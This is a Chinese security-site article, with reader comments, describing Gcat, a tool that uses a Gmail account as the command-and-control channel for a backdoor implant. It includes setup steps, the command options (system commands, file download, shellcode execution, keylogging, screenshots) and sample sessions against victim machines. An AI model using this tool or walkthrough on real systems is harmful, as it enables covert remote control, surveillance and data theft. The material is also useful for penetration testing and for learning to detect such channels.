巧用Gmail做你的C&C服务器

2015-06-29 +5 445891人围观 ,发现 22 个不明物体 工具

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

在渗透测试中,C&C(命令与控制)服务器一直是个关键的问题……Gmail或许是一个不错的选择?那么这款名为Gcat的工具就得出动了。

操作步骤

为了做这个工作,你需要做好下面准备

一个Gmail账号(别用你的个人账号哦……你懂的)

在安全设置中,开启"Allow less secure apps"

repo包含两个文件:

gcat.py 用于命令执行
implant.py 用于后门部署

在上述两个文件中,编辑gmail_user and gmail_pwd为你自己的

使用

Gcat工具

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve
  -list                 List available clients
  -info                 Retrieve info on specified client

命令

 Commands to execute on an implant
  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

部署后门后,用以下命令测试一下:

#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

输出的是UUID,用于标识每个操作系统

操作实例

#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command
Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
       Host Name . . . . . . . . . . . . : unknown-2d44b52
       Primary Dns Suffix  . . . . . . . : 
       Node Type . . . . . . . . . . . . : Unknown
       IP Routing Enabled. . . . . . . . : No
       WINS Proxy Enabled. . . . . . . . : No
-- SNIP --

Gcat下载

下载地址

*本文作者:fu4k,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)

这些评论亮了

  • 乍一看是一个好方法:一般firewall都会对gmail放行 (天朝的除外 :=)),而且gmail强制https,这样IDS也看不见里面的内容。
    但是问题是google也有自己的anti-bot机制。从google来看,很明显的可以发现这个帐号的异常:频繁的大量的从不同的IP登陆,不同的Geo Location. 用一个统计规测就可以把这个帐号block掉,或者要求输入captcha。
    )53( 亮了
  • 上七下 回复
    Google都连不上。。
    )7( 亮了
  • Mrtn 回复
    C&C明明是我西屋的命令与征服!
    )6( 亮了
  • STAY李成 回复
    干掉GFW,啥事都解决了~
    )6( 亮了
发表评论

已有 22 条评论

取消
Loading...
css.php